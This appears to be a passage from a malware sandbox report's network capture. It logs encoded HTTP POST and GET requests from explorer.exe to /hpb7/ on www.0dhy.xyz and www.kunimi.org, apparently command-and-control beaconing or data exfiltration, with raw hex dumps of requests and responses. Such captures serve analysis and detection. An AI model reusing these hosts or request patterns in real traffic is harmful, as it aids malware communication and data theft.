ZY5Gp7RZl6MAj9bxIgm7Sro1h7f97IrSz(Nnfv-x89qPX70X_pFJ5qzwjmPa8xvKlMCic0pAzI3Yh5uGOi3ypzgTSKzSUgK6hkzJRRyHTddyyRhFG65SjiXfdOljsuEOuWd66yFIq~uYzghPFXaYBnw9Hfq4_BtW5wgAmXWrjSR42ByPmlzLDMI28m1kbC1zmpWcYEEj0vcdNYxrRJgOq6NxB2M(3TF~pj0XYcG6aQPhpnRgoRSivNQ5pte7oGed1DIrGdxr_6czGsk7Yf2gZT9CSqK8Eq2jMZlx9n7x_49QDLz3gdRVXeX2JM1oqzmztk9mmCUK52oHRc4ysPUu5SzUojxAWclpefy(okX2iOdHj7LDbbtOr(BO3rEirWtR1QNpb8yDwDzJug-zQDsStMiH2ch2-BFkEnyvDsdM2jKv_OL~gVXzicip0tuKoZldbCIqf6N7ntVHwF89gNtYPwNDEqKM6pKxhv_JINgGDCMsg5GEeGMvsZZo4gxQGOoMBfuLWIqhdkYNIpxZCSGfZ7sqR~ODIH3At3hOAQP4DCCU27qnPxPB5CZWMzWBaOapc(urOmXjAwpxTypTLJs3cbDKaTL5iiA0PAD81LELgJKK0UW3PZRrxzlfK8VWcuhu-kkwXLobAi35XVfisRjOx(hdLsX1kdHDm3LNcscVDd324vhU0zB6ZY0J5j2H6XwK-UYRiAlaucsK9lkJsFOfIsdFBZopgklEUS2WR3KfvIVO9JIEIo2PtA5rteTi_(fGni4~L0AiFDbndugKmdsjNc7Y_anDMnlgfFEC3mdWfM4mupoJB4vcJSmW4lDHq5nNFzUYAT9kX5syPBnanIoQPhZu1u-mFzjK5X0fLIyqkW6~SsiPLP-YVQec1UdPvmJTvp11HM-vlSSi7Ku0yVYCHLXI057yH0CP9zjjy02L7GnfIMuoayjYpcx6iPB3R3wbIEshpIUbuBIp35mqs(oXAs8T2hdtLvjv19oE_(g76prLcv_~jT7bHNvIuT6O_tKK95PuWcUKBIX(2GoPcXsP7f_AXdRuP7UnFljbMTM~7wAAtsFd8~hvg06lkaVvvAW69l-ggGzLv42KhNT5_OB4jMsziDuH1FpU2wm3zAbln1pzkDWKGtKO96i6EBJZL5VBbwGJE1ahgUfU96I0yDXH_q4tMSh9kBq~TlSROcaDycwi0nwsPpPdxquiNxyDLRgejGqf7REoW0l4HHhDJgqnnxXC6IQAE0jfegHXeQh8TNQoizrk5YlMtNsF8X-CMSJwA86h45UJ0OGityNJeXCvlgJ1hxR(oHITcvKrt6nDrXKJHj8fLuHeMifL3189r95IMqvHrVR23Jim3(ESOormPKtKRfl(7I0mlYr5lX32mwS(WBdhdyE7UfYf4f7bJMO7KhxjWb9iS6F~K7vRPmrDbSdJFWhFZn3fRSoc6S2SmUU19RGc_KeIAK1T2vrrhBJgBXWoxnnMqvpldbxoP(s61dTwxFB(uzbfwgz51toTqwhIM8MY1WYnb0xeNoeTc1HR65b3iyvKPwAIohuNhsLgn6gBl8R(GdfkywGWk0KlSzlyNRUzaF7WrQ24rK
                                                          Mar 21, 2023 08:07:38.571118116 CET255INHTTP/1.1 400 Bad Request
                                                          Server: nginx/1.18.0 (Ubuntu)
                                                          Date: Tue, 21 Mar 2023 07:07:38 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 264
                                                          Connection: close
                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 54 68 65 20 70 6c 61 69 6e 20 48 54 54 50 20 72 65 71 75 65 73 74 20 77 61 73 20 73 65 6e 74 20 74 6f 20 48 54 54 50 53 20 70 6f 72 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 63 65 6e 74 65 72 3e 54 68 65 20 70 6c 61 69 6e 20 48 54 54 50 20 72 65 71 75 65 73 74 20 77 61 73 20 73 65 6e 74 20 74 6f 20 48 54 54 50 53 20 70 6f 72 74 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>400 The plain HTTP request was sent to HTTPS port</title></head><body><center><h1>400 Bad Request</h1></center><center>The plain HTTP request was sent to HTTPS port</center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>
                                                          Mar 21, 2023 08:07:38.571203947 CET256OUTPOST /hpb7/ HTTP/1.1
                                                          Host: www.0dhy.xyz
                                                          Connection: close
                                                          Content-Length: 5336
                                                          Cache-Control: no-cache
                                                          Origin: http://www.0dhy.xyz
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Accept: */*
                                                          Referer: http://www.0dhy.xyz/hpb7/
                                                          Accept-Language: en-US
                                                          Accept-Encoding: gzip, deflate
                                                          Data Raw: 62 63 58 33 55 76 3d 4d 70 4e 34 42 63 49 58 75 59 58 5a 77 59 46 77 38 58 7e 4f 28 31 79 4e 51 79 76 5a 74 59 66 63 78 2d 31 50 78 62 4e 58 62 56 32 6f 28 48 46 63 43 48 33 79 49 51 63 49 33 50 6f 5a 4c 55 38 35 71 5a 44 6a 77 71 77 66 37 34 41 63 59 54 58 41 63 43 75 79 46 34 4d 4d 64 53 4b 65 6c 6f 6f 34 35 59 56 30 4a 34 54 44 6b 57 6a 35 36 66 58 34 7a 45 76 53 6f 30 56 58 37 75 67 46 30 53 79 73 62 71 50 33 75 2d 78 74 4d 70 46 6f 57 54 4b 74 4a 72 4f 30 6e 36 32 43 59 70 54 6e 32 31 75 41 47 6e 54 36 75 73 77 53 76 4c 67 42 66 33 57 4b 46 69 5a 61 75 64 4f 75 32 4a 68 59 79 52 42 4f 63 37 71 48 47 52 4a 62 72 55 56 42 47 79 6f 31 75 72 30 64 5a 30 37 45 63 57 36 56 64 6f 62 57 71 59 39 7a 4f 55 54 4f 78 6e 7e 5a 33 65 61 78 30 69 49 61 69 37 77 46 4f 72 33 47 41 33 4d 36 39 48 48 55 72 47 36 46 38 39 33 34 48 53 39 45 4b 72 58 6d 38 68 59 38 74 55 6c 48 67 32 6e 4e 59 42 61 37 74 71 4b 70 32 54 49 4d 37 5f 34 35 7a 75 43 61 47 32 42 51 4c 46 65 74 66 74 59 48 71 77 4c 6f 73 6b 33 6c 73 78 73 6f 66 4d 78 42 6e 4c 51 4b 72 43 6b 67 6c 38 6e 68 4b 6b 69 52 76 31 67 5a 47 55 51 47 79 66 70 33 35 55 4f 54 50 55 55 54 66 6a 47 6b 53 4e 38 47 55 46 47 52 4b 4f 33 58 64 66 61 6d 7e 50 46 77 67 75 49 4d 36 69 65 63 4f 6c 4e 7a 54 61 4c 6e 37 52 75 51 4c 57 46 76 6d 4f 7e 6d 7e 65 47 45 62 58 62 4f 30 32 72 37 61 44 6c 62 69 31 4b 71 4b 32 50 37 44 47 69 38 79 37 49 79 58 32 46 46 77 6c 54 76 47 34 54 4a 56 38 39 71 79 74 57 31 70 4d 62 4d 31 55 49 5a 69 5f 48 35 61 32 64 30 33 6c 36 72 37 4c 30 67 57 61 4b 61 41 56 74 55 4e 45 76 58 39 5a 37 7a 6f 4a 6d 4f 74 54 33 6d 58 49 31 61 73 78 48 30 66 62 4e 4e 6a 70 4c 46 66 58 4b 75 4b 39 71 72 78 75 6d 5a 33 51 51 64 52 35 6e 53 50 45 4c 75 78 67 57 6c 6b 45 7e 31 42 37 5a 4c 55 58 71 4e 72 4a 69 38 4c 52 38 42 69 65 4b 4c 63 41 75 79 70 6e 7a 71 71 71 76 6f 46 46 77 46 6e 78 77 6d 76 66 42 67 34 37 63 75 43 48 70 41 46 69 38 55 57 75 59 77 54 49 4a 49 52 5a 28 52 41 53 4e 51 46 4f 52 77 76 6d 45 69 68 74 62 6b 61 59 6c 74 67 34 35 6f 62 6b 7e 47 46 76 49 2d 71 76 31 5a 45 57 65 46 58 45 68 6b 34 59 46 61 30 42 33 4c 47 4b 72 4f 42 41 51 57 58 30 7a 34 37 4c 73 46 32 66 70 61 54 70 45 36 53 59 36 52 61 5f 77 43 6d 37 64 4b 7e 68 58 53 58 67 4c 58 66 63 4a 47 79 47 42 74 47 6a 34 6b 66 63 66 6a 62 52 6d 79 28 46 53 33 76 35 52 6a 68 64 6b 59 4b 4f 62 30 7e 52 71 69 6e 4e 50 30 75 34 38 41 31 4e 28 6f 64 63 61 67 57 4d 78 33 66 69 7e 6b 53 5f 39 45 42 45 47 48 33 69 57 37 55 6b 74 51 73 78 35 57 45 51 55 44 54 65 36 5f 56 44 41 58 5a 39 79 38 36 69 67 64 52 4b 77 6d 70 72 48 6e 66 64 49 57 43 6a 42 39 31 79 59 43 77 5f 56 34 68 74 50 54 51 2d 4e 47 6e 6d 4f 53 53 69 4a 52 59 77 68 55 6b 59 30 51 73 54 44 41 69 50 76 4f 6d 47
                                                          Data Ascii: bcX3Uv=MpN4BcIXuYXZwYFw8X~O(1yNQyvZtYfcx-1PxbNXbV2o(HFcCH3yIQcI3PoZLU85qZDjwqwf74AcYTXAcCuyF4MMdSKeloo45YV0J4TDkWj56fX4zEvSo0VX7ugF0SysbqP3u-xtMpFoWTKtJrO0n62CYpTn21uAGnT6uswSvLgBf3WKFiZaudOu2JhYyRBOc7qHGRJbrUVBGyo1ur0dZ07EcW6VdobWqY9zOUTOxn~Z3eax0iIai7wFOr3GA3M69HHUrG6F8934HS9EKrXm8hY8tUlHg2nNYBa7tqKp2TIM7_45zuCaG2BQLFetftYHqwLosk3lsxsofMxBnLQKrCkgl8nhKkiRv1gZGUQGyfp35UOTPUUTfjGkSN8GUFGRKO3Xdfam~PFwguIM6iecOlNzTaLn7RuQLWFvmO~m~eGEbXbO02r7aDlbi1KqK2P7DGi8y7IyX2FFwlTvG4TJV89qytW1pMbM1UIZi_H5a2d03l6r7L0gWaKaAVtUNEvX9Z7zoJmOtT3mXI1asxH0fbNNjpLFfXKuK9qrxumZ3QQdR5nSPELuxgWlkE~1B7ZLUXqNrJi8LR8BieKLcAuypnzqqqvoFFwFnxwmvfBg47cuCHpAFi8UWuYwTIJIRZ(RASNQFORwvmEihtbkaYltg45obk~GFvI-qv1ZEWeFXEhk4YFa0B3LGKrOBAQWX0z47LsF2fpaTpE6SY6Ra_wCm7dK~hXSXgLXfcJGyGBtGj4kfcfjbRmy(FS3v5RjhdkYKOb0~RqinNP0u48A1N(odcagWMx3fi~kS_9EBEGH3iW7UktQsx5WEQUDTe6_VDAXZ9y86igdRKwmprHnfdIWCjB91yYCw_V4htPTQ-NGnmOSSiJRYwhUkY0QsTDAiPvOmG


                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                          3192.168.2.349701198.46.160.9780C:\Windows\explorer.exe
                                                          TimestampkBytes transferredDirectionData
                                                          Mar 21, 2023 08:07:41.091881037 CET257OUTGET /hpb7/?bcX3Uv=BrlYCq9+qqzfybZpwXKugHGOc0m4ktDYrdhK4pNzcFj3giICUF3BZQEP3ssdPmgNj5Kg/PdRxbVpWQCkOBnIEYQcZEeIna030A==&xN_j=yFbSaCxwQG4Y-X HTTP/1.1
                                                          Host: www.0dhy.xyz
                                                          Connection: close
                                                          Data Raw: 00 00 00 00 00 00 00
                                                          Data Ascii:
                                                          Mar 21, 2023 08:07:41.210010052 CET257INHTTP/1.1 400 Bad Request
                                                          Server: nginx/1.18.0 (Ubuntu)
                                                          Date: Tue, 21 Mar 2023 07:07:41 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 264
                                                          Connection: close
                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 54 68 65 20 70 6c 61 69 6e 20 48 54 54 50 20 72 65 71 75 65 73 74 20 77 61 73 20 73 65 6e 74 20 74 6f 20 48 54 54 50 53 20 70 6f 72 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 63 65 6e 74 65 72 3e 54 68 65 20 70 6c 61 69 6e 20 48 54 54 50 20 72 65 71 75 65 73 74 20 77 61 73 20 73 65 6e 74 20 74 6f 20 48 54 54 50 53 20 70 6f 72 74 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>400 The plain HTTP request was sent to HTTPS port</title></head><body><center><h1>400 Bad Request</h1></center><center>The plain HTTP request was sent to HTTPS port</center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                          4192.168.2.349702219.94.129.18180C:\Windows\explorer.exe
                                                          TimestampkBytes transferredDirectionData
                                                          Mar 21, 2023 08:07:47.061011076 CET258OUTPOST /hpb7/ HTTP/1.1
                                                          Host: www.kunimi.org
                                                          Connection: close
                                                          Content-Length: 188
                                                          Cache-Control: no-cache
                                                          Origin: http://www.kunimi.org
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Accept: */*
                                                          Referer: http://www.kunimi.org/hpb7/
                                                          Accept-Language: en-US
                                                          Accept-Encoding: gzip, deflate
                                                          Data Raw: 62 63 58 33 55 76 3d 47 75 61 75 64 39 45 4f 77 48 76 76 68 62 77 68 55 70 32 5f 62 59 48 39 4f 65 73 6d 4f 5a 6c 61 76 33 55 61 6d 59 76 44 30 34 4c 4d 49 46 6d 4b 37 6a 61 33 72 71 57 59 66 61 6f 53 34 41 7a 58 48 5a 6c 72 54 63 71 45 75 65 68 32 70 50 69 6a 67 35 4e 71 62 74 42 72 79 38 78 4a 38 52 71 56 4a 7a 7a 39 58 33 43 2d 69 69 33 4f 56 4f 4d 48 6a 67 4d 72 61 51 59 64 79 70 39 4d 28 43 33 37 52 2d 42 49 50 47 33 5a 4d 5a 73 6b 6f 73 6b 4f 5a 63 71 39 38 58 43 52 6c 6d 31 4f 38 4f 4a 49 76 6a 43 6f 30 4e 37 50 7a 5a 31 49 39 6a 4f 44 63 51 29 2e 00 00 00 00 00 00 00 00
                                                          Data Ascii: bcX3Uv=Guaud9EOwHvvhbwhUp2_bYH9OesmOZlav3UamYvD04LMIFmK7ja3rqWYfaoS4AzXHZlrTcqEueh2pPijg5NqbtBry8xJ8RqVJzz9X3C-ii3OVOMHjgMraQYdyp9M(C37R-BIPG3ZMZskoskOZcq98XCRlm1O8OJIvjCo0N7PzZ1I9jODcQ).
                                                          Mar 21, 2023 08:07:48.162316084 CET260INHTTP/1.1 404 Not Found
                                                          Server: nginx
                                                          Date: Tue, 21 Mar 2023 07:07:48 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          X-Powered-By: PHP/7.4.33
                                                          Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                          Cache-Control: no-cache, must-revalidate, max-age=0
                                                          Link: <https://kunimi.org/wp-json/>; rel="https://api.w.org/"
                                                          Vary: Accept-Encoding
                                                          Content-Encoding: gzip
                                                          Data Raw: 64 64 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec fd 6b 93 6c 49 92 18 86 7d e7 af 38 b8 57 57 7d ab 27 33 6f be 2b ab 6a fb 72 67 67 a7 77 07 b3 f3 d8 9d dd 25 16 83 b6 6b 27 33 4f 56 65 df cc 3c 39 99 27 6f dd ea 62 c1 76 66 00 89 6b 00 0c 1f 24 f1 21 92 92 91 84 48 89 12 48 98 81 14 65 30 98 c9 4c 3f 85 4d 88 c0 27 fd 05 c5 fb 78 44 78 bc ce c9 ba 33 80 71 7b a7 bb f2 84 87 87 87 87 47 84 bb 87 87 c7 ef fc b5 65 b9 a8 1e f6 45 76 57 6d 37 6f 7f 87 fe 3b db e4 bb db 2f 5e 7c 9d bf 20 bf 8b 7c f9 f6 77 b6 45 95 67 8b bb fc 70 2c aa 2f 5e 9c aa 55 77 f6 42 7c dd e5 db e2 8b 17 1f d6 c5 fd be 3c 54 2f b2 45 b9 ab 8a 1d 81 ba 5f 2f ab bb 2f 96 c5 87 f5 a2 e8 b2 1f 9d 6c bd 5b 57 eb 7c d3 3d 2e f2 4d f1 c5 a0 d7 ef 64 b2 66 77 b5 ae be 58 94 1f 8a 83 8e f9 50 ac 8a c3 81 7c ad 31 ef ca ae fc da bd bf 2b 76 dd 65 79 bf bb 3d e4 cb 42 af ba 2a 0f db bc ea 2e 8b aa 58 54 eb 72 07 50 54 c5 a6 d8 df 95 bb e2 8b 5d 49 2a 1d 17 87 f5 be ca f2 e3 c3 6e 91 1d 0f 8b 2f 5e dc 55 d5 fe 78 fd e6 cd fd fd 7d ef b6 2c 6f 37 04 ed ed 36 df e5 b7 c5 a1 b7 28 b7 6f 6e c9 ef 37 5f 1f ff ed f5 f2 8b 3f fb 6e 77 38 99 8d 66 57 97 e3 51 77 40 d0 bd e1 f8 24 de b7 ff 56 96 dd af 77 84 ca de 32 af f2 3f ca 1f 8a 43 f6 85 fd e9 df fd 77 b3 9f 7f 75 43 80 57 a7 1d 23 38 a3 8d bc be 78 54 20 bd fd e9 78 f7 3a 3f dc 9e b6 a4 1b c7 8b 9b 27 02 cd 80 3e fb fa f8 59 27 db 15 f7 d9 ef e7 55 f1 fa e2 e2 e6 df 52 45 a4 d7 ab f5 2d 29 fe 4c a7 f4 33 02 64 d2 da 94 07 7f d0 1d fd c5 97 3f fd f2 c7 7f fe e3 3f 1e fd 36 73 00 d2 a9 f7 1f 08 0e ef 6c f7 b8 ae 8a 2e 11 c8 f5 6a bd c8 0d 01 fa f3 9f 9d fe 68 f5 e3 5d ff 63 fe f5 f6 27 df fc f8 f7 27 7f f6 70 f9 fd ef 7f e8 7f bd fb a3 cb 6f de f7 7f 5a fe e0 47 c7 1f 5c 5d ee be 5c 1d 5f bc 79 fb 3b 9b f5 ee 7d 76 28 36 5f bc d8 1f 0a 82 64 47 24 32 5b ee 8e dd 3d 95 e4 6a 71 f7 22 bb 23 7f 7d f1 c2 cd ed 17 0d b1 74 09 8a cd 43 b5 5e 1c d3 b1 e4 5f e7 1f 05 9a 7c bf 6e 80 60 b1 dc 7d 4d aa 6d ca d3 72 b5 c9 0f 45 3a 86 3d e9 7f be 1c 0a 2a 88 70 2e c5 60 a4 a3 12 1d 59 1e 7b b7 bd 65 79 9a 6f 8a c5 66 bd 78 df db 15 55 1a a2 6a bf 38 07 3d f9 b2 1d 19 6c 8c 8f 15 69 7d d1 60 64 8e 85 e8 43 7a dd 15 99 05 c7 e6 4d 8b ea 6d c4 6a 7b ec fd e2 94 13 34 c5 e1 43 83 0e 1c 8b c5 89 08 23 d9 33 3e 90 85 a5 c1 f4 22 72 dd 83 63 5f dd af b7 b7 cd d0 7c 7d 5c 16 9b f5 87 43 fa f8 af b7 64 6e 1c bb ab a2 77 3c 6e ba e2 57 be cd bf 69 22 8c a4 c2 9e 2c 39 b4 33 4d 51 6c 7b db 62 b9 ce 1b 93 b0 ee 6d cb e3 dd 7a 5b 36 98 4a db 4d ef 43 be 39 11 b0 ed b6 38 2c 1a c8 c4 32 df 2c ce 80 63 1e c6 b1 29 f3 e5 0b b2 d1 52 0d 65 47 54 26 aa 7e f1 bf df dc 97 ab 95 44 47 b7 5f b2 fb be 3f ed d6 db 75 af 3c dc be b9 df 77 c5 06 f4 a6 ba 2b b6
                                                          Data Ascii: dd6aklI}8WW}'3o+jrggw%k'3OVe<9'obvfk$!HHe0L?M'xDx3q{GeEvWm7o;/^| |wEgp,/^UwB|<T/E_//l[W|=.MdfwXP|1+vey=B*.XTrPT]I*n/^Ux},o76(on7_?nw8fWQw@$Vw2?CwuCW#8xT x:?'>Y'URE-)L3d??6sl.jh]c''poZG\]\_y;}v(6_dG$2[=jq"#}tC^_|n`}MmrE:=*p.`Y{eyofxUj8=li}`dCzMmj{4C#3>"rc_|}\Cdnw<nWi",93MQl{bmz[6JMC98,2,c)ReGT&~DG_?u<w+
                                                          Mar 21, 2023 08:07:48.162358046 CET261INData Raw: c5 91 8c da a2 2c 77 dd 6d 7e ac 8a c3 9b fb 62 ce e6 d6 9b 35 69 95 7c 7f a3 fd ea 71 e4 8b 43 79 3c 96 87 f5 ed 7a 97 46 d7 f0 0c 84 d1 7f e7 f7 c5 b1 dc 16 13 f0 35 ef ce 0f f9 6e 79 ec 8e fb fd 9e 68 eb b7 93 ce 43 71 7b 22 1b d9 6f 3f a1 c7
                                                          Data Ascii: ,wm~b5i|qCy<zF5nyhCq{"o?r^vdVjS?"3|??U3njC//k]hsQ@Wt%eT haVMPAkut(v}ELyGf:j-
                                                          Mar 21, 2023 08:07:48.162380934 CET262INData Raw: 12 27 db f5 86 d8 b6 5d a2 c6 6d 96 8f ba 06 64 4b be bd 6a 3d a2 ba 0c c7 83 21 a0 a4 08 dd b3 fb 35 d9 ab d4 c9 5a 77 53 ac aa 47 fe e9 41 82 5c b3 0e 1e 89 2e 88 ec 4f 7e 54 1a 9f 98 06 d3 5d 57 c5 f6 d8 10 a5 d0 a1 4c fa 1c 8a 54 10 91 93 ba
                                                          Data Ascii: ']mdKj=!5ZwSGA\.O~T]WLTt\QCW|KHd{Adbg"h#sqt\Ss.Bgu~JizZW|T='du_$PVCV-7r?^.K,+U}(o,|,B
                                                          Mar 21, 2023 08:07:48.162405014 CET264INData Raw: f1 a8 bf ff 78 a3 69 32 b8 d4 dc d8 0e 39 35 fc 03 97 db d2 a4 9c 53 6a 38 4a ba cb f5 96 ef 87 0b b2 72 1d 3f ff a2 6b 1e 8c 6a 5b 23 40 94 9d 01 d3 19 50 34 21 c3 3e fc 7d d9 ef f7 71 7e 61 f8 cd 4f f4 b6 eb 9a 8c 4a 0c 6d ae ba de 03 e9 f8 a1
                                                          Data Ascii: xi295Sj8Jr?kj[#@P4!>}q~aOJmd*b!oV"mwj5dK]wsBn{jqoQ&npMZ|cu`%h 92QO|0Os-eH->V3z>P[|F*>i
                                                          Mar 21, 2023 08:07:48.162431955 CET265INData Raw: e1 00 3d 91 8a 87 f5 26 47 d4 18 7b 28 4f a7 93 52 55 fb 10 87 56 be af e1 04 f8 ac dc 29 1e 66 e3 3e 78 f9 a3 37 1e 13 44 be c4 be c5 76 5e 2c 51 97 1d 28 31 b4 fc 9f d3 ec 5c 1c e1 17 b4 d2 57 6f f9 17 fe cc 14 7d 99 e9 0d ab fc e2 2b bc 0e 43
                                                          Data Ascii: =&G{(ORUV)f>x7Dv^,Q(1\Wo}+Cak%{m)5{Q'<pb{[g8~0XG+(6}W^xsPu/wGuj?Vd%:A([&E\fe6WvGpvi<&
                                                          Mar 21, 2023 08:07:48.162456036 CET266INData Raw: 21 45 d1 c1 43 78 ec 91 11 55 10 7a 48 2f 91 ec b7 c8 79 53 74 5d 32 0c 75 a0 09 4e bd 76 04 da b4 21 24 d6 02 06 57 e8 1c fa 6b eb 2d bd f1 97 ab c7 15 8d 5b 56 a9 6d 83 f3 dc b3 c7 00 88 38 06 10 87 00 de 12 1e 91 d5 47 44 4f 63 97 22 04 07 a6
                                                          Data Ascii: !ECxUzH/ySt]2uNv!$Wk-[Vm8GDOc"`~6Ap9H;h>3KVC-=/Le+,dt k79l4 rF&TQALNd!UQ(2+8+#%|a_x$d3iHjh)k@&
                                                          Mar 21, 2023 08:07:48.162482023 CET268INData Raw: 7f ba c4 ee bb 2b 91 75 0c c2 f8 57 ca d9 60 e8 5e 86 04 06 b1 9c 27 59 91 3a 9a 15 51 f7 89 36 22 9c 61 59 6e 04 35 f0 3a b1 b5 71 17 0c e2 78 8a 44 e8 5a 6c 49 87 c0 aa 9e 84 cc 5e 87 6b 64 66 4a b2 30 36 dd 05 50 b3 1b 39 b5 2e 37 9d d3 c6 e1
                                                          Data Ascii: +uW`^'Y:Q6"aYn5:qxDZlI^kdfJ06P9.7 #;_?Xu:.7_hi`#_nW7.i3h0B'7D3*g927<7qsF5 %6>C/>^=sdryUHX
                                                          Mar 21, 2023 08:07:48.162507057 CET269INData Raw: 30 4a 50 79 c3 26 5c 85 ac 1e 9b f2 f6 f1 96 18 bc f2 42 b4 f5 1e 96 67 05 71 7a 50 73 be f7 dc 5b 6f 9f 5d d8 ef 6d 25 e2 97 33 bf 59 13 ed 15 da df 48 c3 e1 4e 3f 5a 4f ab c5 9b d7 0e da 00 4d c9 5b 05 ee e0 0c b5 ae a6 d7 db e7 6a 51 33 c9 03
                                                          Data Ascii: 0JPy&\BgqzPs[o]m%3YHN?ZOM[jQ3-vHC&b3vo@.~{_+9Vy2<M_d>ky}~:tC?4Z5&!hQ~"yDCuaz]5DG\X\U\]]L]-&#x8*^
                                                          Mar 21, 2023 08:07:48.162532091 CET270INData Raw: 62 93 e3 1b e0 e1 d0 11 0d e8 71 d3 fe 06 c4 cd e1 ae 62 a9 17 7f 27 9a d8 20 aa 47 2b e8 3b 8a 13 60 4e fb d1 23 d1 e2 f1 ac 66 7f c7 90 0f 23 cf e3 e8 67 ab 16 8b ba 21 53 3f d0 05 0d 36 aa 99 6c bd db 9f aa 9f d3 67 5a bf a0 b6 e0 ba fa 8a 6b
                                                          Data Ascii: bqb' G+;`N#f#g!S?6lgZkJwLfz~.b_wC?Z7/mn4#|Zud4=$5LGM9T-5!iumW;D%K1D#EY_Gzc~/`Q|;`06L
                                                          Mar 21, 2023 08:07:48.162559032 CET272INData Raw: 41 64 51 22 d6 0f 0d 58 97 73 1c c1 a6 0f 45 9d 73 8c 46 4c bb ba 78 b6 d6 50 08 3a 3e c6 93 d7 d6 15 49 e6 48 ed 67 dc a9 f1 dc d4 58 c1 c7 e7 6a 30 38 cb d4 7c 62 cb 4d d6 c3 66 13 d4 71 83 4d ca 0d c5 30 72 6a 37 bd 39 e4 37 f0 01 69 be 1f 83
                                                          Data Ascii: AdQ"XsEsFLxP:>IHgXj08|bMfqM0rj797iw(Weu.Zk5MFr0FONLCpWZ8W$z)oK\#q^B^KF]\SM/PW>imkM6Um&hvq,k h2nc
                                                          Mar 21, 2023 08:07:48.462626934 CET273INData Raw: 66 28 b7 42 27 ed e2 24 f3 37 0e 75 6d f8 6a d6 6e 2b 9c c2 b8 d5 2c da 36 08 95 01 ab 59 ad ad 30 72 23 f5 3c fb 95 30 44 35 eb b3 15 3e 6e 6c 6a 16 66 5b 7c d4 a0 d4 ac c8 36 08 b9 d1 a8 59 8a ad d0 a9 81 e0 d6 60 1b 5c ca 1a d3 4c b0 56 18 95
                                                          Data Ascii: f(B'$7umjn+,6Y0r#<0D5>nljf[|6Y`\LV9mP2#NZa-]/,~nSaKMh.;PF.[;1x@DS,R(+QNMP.VgLhvR7n//p2;3naqwhw0*


                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                          5192.168.2.349703219.94.129.18180C:\Windows\explorer.exe
                                                          TimestampkBytes transferredDirectionData
                                                          Mar 21, 2023 08:07:50.112668991 CET360OUTPOST /hpb7/ HTTP/1.1
                                                          Host: www.kunimi.org
                                                          Connection: close
                                                          Content-Length: 5336
                                                          Cache-Control: no-cache
                                                          Origin: http://www.kunimi.org
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Accept: */*
                                                          Referer: http://www.kunimi.org/hpb7/
                                                          Accept-Language: en-US
                                                          Accept-Encoding: gzip, deflate
                                                          Data Raw: 62 63 58 33 55 76 3d 47 75 61 75 64 39 45 4f 77 48 76 76 67 37 41 68 48 61 65 5f 64 34 48 38 45 2d 73 6d 41 4a 6c 57 76 33 49 61 6d 5a 37 74 30 4f 54 4d 49 32 75 4b 36 42 43 33 70 71 57 59 58 36 70 61 6c 77 7a 42 48 5a 68 42 54 59 6a 78 75 63 4e 32 6f 62 4b 6a 6e 5a 4e 70 54 74 42 71 31 38 78 4b 68 42 71 56 4a 7a 7e 73 58 79 33 44 69 6a 50 4f 55 35 4d 48 6a 6c 51 73 61 41 59 65 76 35 39 4d 28 44 4c 6b 52 2d 41 7a 50 47 65 45 4d 59 4d 6b 70 39 55 4f 66 4a 65 38 28 48 43 4c 35 32 30 59 77 64 6f 6e 6b 79 44 61 32 4f 50 32 31 74 59 58 34 7a 28 6f 4b 56 6d 74 64 35 59 59 65 58 43 6d 49 6d 4a 48 4c 30 68 6f 74 6d 52 78 75 6e 77 4b 32 6d 39 7a 4c 48 70 78 50 6b 35 47 5a 6b 69 4c 68 68 62 54 70 7a 58 54 39 55 62 59 43 39 4b 4c 70 62 64 75 76 56 57 4b 56 63 70 45 41 33 32 4e 58 63 4d 66 54 6c 45 57 38 62 64 69 34 61 70 5f 37 39 41 76 41 34 47 30 6f 53 62 6d 65 4a 42 32 4a 6a 70 65 44 4c 53 73 68 6f 73 79 6f 30 58 4f 56 41 38 6e 32 35 54 35 56 